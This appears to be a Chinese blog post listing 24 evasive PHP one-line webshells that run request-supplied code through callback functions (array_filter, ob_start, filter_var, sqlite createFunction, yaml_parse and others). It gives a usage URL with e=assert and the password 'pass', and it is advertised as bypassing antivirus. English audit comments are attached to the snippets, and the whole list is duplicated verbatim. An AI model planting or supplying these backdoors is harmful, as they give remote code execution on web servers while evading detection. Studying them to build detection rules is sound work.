一些无特征PHP一句话
2015-07-26 09:37
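不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)注:这些写法的共同点是"回调函数名或其参数来自请求数据";其中依赖正则 /e 修饰符的写法在 PHP 7.0 起失效,依赖字符串形式 assert() 或 create_function() 的写法在 PHP 8.0 起失效,因此代码审计与检测规则应以"回调参数可追溯到 $_GET/$_POST/$_REQUEST"为准,而不是只匹配 eval 等函数名。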
原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass
01
// Request-controlled callback: $e (the callable name) and the array element both come
// from the request, and array_filter() calls $e on that element.
// Review rule: a callable argument must never trace back to $_GET/$_POST/$_REQUEST.
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, $e);
02
// Callback sink via array_map(): the callable is the first argument and is read from the
// request; the mapped value is request data as well.
// Static indicator: array_map() whose callback is a variable assigned from a superglobal.
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map($e, $arr);
03
// uasort() invokes the comparator on pairs of elements; here the comparator name is
// request-supplied and one of the two elements is request data.
// Sort comparators should be closures or fixed method references, never request strings.
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, $e);
04
// uksort() compares array keys, and the request value is placed in the array as a key so
// that it reaches the request-chosen comparator.
// Taint tracking has to follow data used as array keys, not only array values.
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
05
// No request-chosen callable here: the comparator is the fixed string 'assert', called by
// ArrayObject::uasort() on elements that include request data.
// String-argument assert() was deprecated in PHP 7.2 and no longer evaluates code in
// PHP 8.0; 'assert' appearing as a callback string is a strong review indicator.
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
06
// ArrayObject::uksort() passes array keys to the fixed 'assert' comparator, and the
// request value is used as a key.
// Only meaningful on PHP versions where assert() evaluates a string argument (before 8.0).
$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
$arr->uksort('assert');
07
// array_reduce() hands its third argument to the callback as the initial carry, so the
// request value reaches the request-chosen callable even though $arr holds only a constant.
// Auditing must cover the initial-value argument, not just the array being reduced.
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);
08
// array_udiff() calls the user comparator with elements drawn from the input arrays; the
// comparator name comes from the request and $arr carries request data.
// The array_u*() family takes a trailing callable and belongs on the callback-sink list.
$e = $_REQUEST['e'];
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);
09
// array_walk() calls the callback with (value, key, extra argument): here a fixed PCRE
// pattern ending in the /e modifier, a request-supplied key, and ''.
// The /e (evaluate replacement) modifier was deprecated in PHP 5.5 and removed in 7.0;
// the '|.*|e' literal is a usable static signature when scanning legacy code bases.
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk($arr, $e, '');
10
// array_walk_recursive() uses the same (value, key, extra argument) callback convention as
// array_walk(): a fixed /e pattern as value, a request-supplied key, and ''.
// /e was deprecated in PHP 5.5 and removed in 7.0; the callable name is request-supplied,
// which is the property a code review should reject regardless of PHP version.
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
11
// The 'e' option makes mb_ereg_replace() evaluate the replacement string as PHP code, and
// the replacement here is request data.
// The option was deprecated in PHP 7.1 and removed in 8.0; on older runtimes, flag any
// mb_ereg_replace() call whose option string contains 'e'.
mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');
12
// preg_filter() accepts the same pattern modifiers as preg_replace(); with /e the
// replacement (request data here) is evaluated as PHP code.
// /e was deprecated in PHP 5.5 and removed in 7.0.
echo preg_filter('|.*|e', $_REQUEST['pass'], '');
13
// ob_start() registers 'assert' as the output-buffer callback, so whatever is echoed
// (request data) is handed to it when the buffer is flushed.
// Output callbacks are an easily missed callback sink; this form depends on
// string-evaluating assert(), i.e. PHP versions before 8.0.
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();
14
// register_shutdown_function() stores a callable plus arguments and runs them when the
// script ends; both are request-supplied here.
// The call happens outside the normal request-handling path, so it is easy to overlook
// when reading the script top to bottom.
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
15
// declare(ticks=1) makes the engine run registered tick functions as statements execute;
// register_tick_function() is given a request-chosen callable and a request value.
// declare(ticks=...) is rare in application code, so its presence alone merits review.
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function($e, $_REQUEST['pass']);
16
// FILTER_CALLBACK turns filter_var() into a callback invoker: the 'options' entry names
// the function ('assert') that is applied to the request value.
// The filter API reads as input validation, so audits should look for FILTER_CALLBACK
// specifically. Depends on string-evaluating assert() (PHP before 8.0).
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
17
// filter_var_array() with a FILTER_CALLBACK definition: the per-key 'options' entry names
// the function ('assert') applied to the request value stored under 'test'.
// Audit filter definitions for FILTER_CALLBACK wherever filtered data originates from a
// request. Depends on string-evaluating assert() (PHP before 8.0).
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
18
// PDO::sqliteCreateFunction() exposes a PHP callable as an SQL function; the callable name
// is request-supplied and the query invokes it on a bound request value.
// Parameter binding prevents SQL injection but does nothing here, because the danger is
// the registered function itself. Uses PDO with the sqlite driver.
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
19
// SQLite3::createFunction() registers a PHP callable as an SQL function; the callable name
// is request-supplied and the prepared statement calls it on a bound request value.
// Binding the value is not a mitigation: user-defined SQL functions must only ever be
// registered with fixed, application-owned callables. Uses the sqlite3 extension.
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
$stmt->execute();
20
// yaml_parse() accepts a map of YAML tag => PHP callable; the tag name is derived from
// request data and mapped to 'preg_replace', while the tagged value is a /e pattern.
// Indicators: a callbacks array passed to yaml_parse() and the "|.+|e" literal.
// /e was removed in PHP 7.0; uses the yaml extension.
$str = urlencode($_REQUEST['pass']);
$yaml = <<<EOD
greeting: !{$str} "|.+|e"
EOD;
$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));
21
// The eighth argument of Memcache::addServer() is a failure callback; it is built with
// create_function() around assert(), and connect() is given a request value as host.
// NOTE(review): presumably the callback receives the host name when the connection
// fails - confirm against the memcache extension documentation.
// create_function() was deprecated in PHP 7.2 and removed in 8.0.
$mem = new Memcache();
$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
$mem->connect($_REQUEST['pass'], 11211, 0);
22
// preg_replace_callback() passes the match array to a callback created with
// create_function(), which forwards the matched request text to assert().
// No /e modifier or request-chosen callable is involved; the indicators are
// create_function() and assert() on matched text. Both were removed/changed in PHP 8.0.
preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);
23
// mb_ereg_replace_callback() passes the match array to a create_function() callback that
// forwards the matched request text to assert().
// Indicators: create_function() (removed in PHP 8.0) and assert() applied to match data.
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);
24
// CallbackFilterIterator calls its callback for each element during iteration; the
// callback is a create_function() wrapper around assert() and the element is request data.
// SPL iterators that take callables belong on the callback-sink list as well.
// create_function() was removed in PHP 8.0.
$iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);'));
foreach ($iterator as $item) {echo $item;}
原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass
01
// Request-controlled callback: $e (the callable name) and the array element both come
// from the request, and array_filter() calls $e on that element.
// Review rule: a callable argument must never trace back to $_GET/$_POST/$_REQUEST.
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, $e);
02
// Callback sink via array_map(): the callable is the first argument and is read from the
// request; the mapped value is request data as well.
// Static indicator: array_map() whose callback is a variable assigned from a superglobal.
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map($e, $arr);
03
// uasort() invokes the comparator on pairs of elements; here the comparator name is
// request-supplied and one of the two elements is request data.
// Sort comparators should be closures or fixed method references, never request strings.
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, $e);
04
// uksort() compares array keys, and the request value is placed in the array as a key so
// that it reaches the request-chosen comparator.
// Taint tracking has to follow data used as array keys, not only array values.
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
05
// No request-chosen callable here: the comparator is the fixed string 'assert', called by
// ArrayObject::uasort() on elements that include request data.
// String-argument assert() was deprecated in PHP 7.2 and no longer evaluates code in
// PHP 8.0; 'assert' appearing as a callback string is a strong review indicator.
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
06
// ArrayObject::uksort() passes array keys to the fixed 'assert' comparator, and the
// request value is used as a key.
// Only meaningful on PHP versions where assert() evaluates a string argument (before 8.0).
$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
$arr->uksort('assert');
07
// array_reduce() hands its third argument to the callback as the initial carry, so the
// request value reaches the request-chosen callable even though $arr holds only a constant.
// Auditing must cover the initial-value argument, not just the array being reduced.
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);
08
// array_udiff() calls the user comparator with elements drawn from the input arrays; the
// comparator name comes from the request and $arr carries request data.
// The array_u*() family takes a trailing callable and belongs on the callback-sink list.
$e = $_REQUEST['e'];
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);
09
// array_walk() calls the callback with (value, key, extra argument): here a fixed PCRE
// pattern ending in the /e modifier, a request-supplied key, and ''.
// The /e (evaluate replacement) modifier was deprecated in PHP 5.5 and removed in 7.0;
// the '|.*|e' literal is a usable static signature when scanning legacy code bases.
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk($arr, $e, '');
10
// array_walk_recursive() uses the same (value, key, extra argument) callback convention as
// array_walk(): a fixed /e pattern as value, a request-supplied key, and ''.
// /e was deprecated in PHP 5.5 and removed in 7.0; the callable name is request-supplied,
// which is the property a code review should reject regardless of PHP version.
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
11
// The 'e' option makes mb_ereg_replace() evaluate the replacement string as PHP code, and
// the replacement here is request data.
// The option was deprecated in PHP 7.1 and removed in 8.0; on older runtimes, flag any
// mb_ereg_replace() call whose option string contains 'e'.
mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');
12
// preg_filter() accepts the same pattern modifiers as preg_replace(); with /e the
// replacement (request data here) is evaluated as PHP code.
// /e was deprecated in PHP 5.5 and removed in 7.0.
echo preg_filter('|.*|e', $_REQUEST['pass'], '');
13
// ob_start() registers 'assert' as the output-buffer callback, so whatever is echoed
// (request data) is handed to it when the buffer is flushed.
// Output callbacks are an easily missed callback sink; this form depends on
// string-evaluating assert(), i.e. PHP versions before 8.0.
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();
14
// register_shutdown_function() stores a callable plus arguments and runs them when the
// script ends; both are request-supplied here.
// The call happens outside the normal request-handling path, so it is easy to overlook
// when reading the script top to bottom.
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
15
// declare(ticks=1) makes the engine run registered tick functions as statements execute;
// register_tick_function() is given a request-chosen callable and a request value.
// declare(ticks=...) is rare in application code, so its presence alone merits review.
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function($e, $_REQUEST['pass']);
16
// FILTER_CALLBACK turns filter_var() into a callback invoker: the 'options' entry names
// the function ('assert') that is applied to the request value.
// The filter API reads as input validation, so audits should look for FILTER_CALLBACK
// specifically. Depends on string-evaluating assert() (PHP before 8.0).
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
17
// filter_var_array() with a FILTER_CALLBACK definition: the per-key 'options' entry names
// the function ('assert') applied to the request value stored under 'test'.
// Audit filter definitions for FILTER_CALLBACK wherever filtered data originates from a
// request. Depends on string-evaluating assert() (PHP before 8.0).
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
18
// PDO::sqliteCreateFunction() exposes a PHP callable as an SQL function; the callable name
// is request-supplied and the query invokes it on a bound request value.
// Parameter binding prevents SQL injection but does nothing here, because the danger is
// the registered function itself. Uses PDO with the sqlite driver.
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
19
// SQLite3::createFunction() registers a PHP callable as an SQL function; the callable name
// is request-supplied and the prepared statement calls it on a bound request value.
// Binding the value is not a mitigation: user-defined SQL functions must only ever be
// registered with fixed, application-owned callables. Uses the sqlite3 extension.
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
$stmt->execute();
20
// yaml_parse() accepts a map of YAML tag => PHP callable; the tag name is derived from
// request data and mapped to 'preg_replace', while the tagged value is a /e pattern.
// Indicators: a callbacks array passed to yaml_parse() and the "|.+|e" literal.
// /e was removed in PHP 7.0; uses the yaml extension.
$str = urlencode($_REQUEST['pass']);
$yaml = <<<EOD
greeting: !{$str} "|.+|e"
EOD;
$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));
21
// The eighth argument of Memcache::addServer() is a failure callback; it is built with
// create_function() around assert(), and connect() is given a request value as host.
// NOTE(review): presumably the callback receives the host name when the connection
// fails - confirm against the memcache extension documentation.
// create_function() was deprecated in PHP 7.2 and removed in 8.0.
$mem = new Memcache();
$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
$mem->connect($_REQUEST['pass'], 11211, 0);
22
// preg_replace_callback() passes the match array to a callback created with
// create_function(), which forwards the matched request text to assert().
// No /e modifier or request-chosen callable is involved; the indicators are
// create_function() and assert() on matched text. Both were removed/changed in PHP 8.0.
preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);
23
// mb_ereg_replace_callback() passes the match array to a create_function() callback that
// forwards the matched request text to assert().
// Indicators: create_function() (removed in PHP 8.0) and assert() applied to match data.
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);
24
// CallbackFilterIterator calls its callback for each element during iteration; the
// callback is a create_function() wrapper around assert() and the element is request data.
// SPL iterators that take callables belong on the callback-sink list as well.
// create_function() was removed in PHP 8.0.
$iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);'));
foreach ($iterator as $item) {echo $item;}